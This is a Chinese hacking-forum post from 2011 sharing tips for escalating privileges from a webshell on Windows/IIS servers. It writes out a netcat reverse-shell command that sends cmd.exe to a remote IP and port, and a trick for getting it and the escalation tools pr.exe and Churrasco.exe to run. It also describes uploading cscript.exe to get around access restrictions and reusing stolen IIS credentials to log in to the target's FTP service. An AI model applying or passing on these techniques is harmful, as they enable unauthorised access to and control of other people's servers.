查看: 30|回复: 0

[入侵防御] webshell下提权两个小技巧分享

[复制链接]

4

主题

0

回帖

0

积分

热心网友

金币
0
阅读权限
220
精华
0
威望
0
贡献
0
在线时间
0 小时
注册时间
2008-8-1
发表于 2011-3-31 21:53:20 | 显示全部楼层 |阅读模式
webshell提权小技巧

cmd路径:
c:\windows\temp\cmd.exe
nc也在同目录下
例如反弹cmdshell:
"c:\windows\temp\nc.exe -vv ip 999 -e c:\windows\temp\cmd.exe"
通常都不会成功。

而直接在 cmd路径上 输入 c:\windows\temp\nc.exe
命令输入 -vv ip 999 -e c:\windows\temp\cmd.exe
却能成功。。
这个不是重点
我们通常 执行 pr.exe 或 Churrasco.exe 时 有时候也需要 按照上面的 方法才能成功。

友情检测波尔远程控制官方网站
作者:MYC00l [Y.D.T]

第一处:把代码保存为1.vbs 上传到服务器上,执行cscript 1.vbs,又提示拒绝访问。

其实这里,我们只要自己上传一个cscript.exe 一般就可以解决问题,这个程序默认位于系统文件夹下,是win32 控制台下的脚本宿主引擎,用来执行vbs 等脚本程序的。

第二处:用VBS脚本查看到目标IIS帐号和密码后,CMD下FTP发现目标用的是微软FTP,直接用IIS帐号和密码登录进去了。

IIS帐号和密码和微软自带的FTP帐号和密码默认都是一样的。

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

相关侵权、举报、投诉及建议等,请发 E-mail:qiongdian@foxmail.com

Powered by Discuz! X5.0 © 2001-2026 Discuz! Team.

在本版发帖返回顶部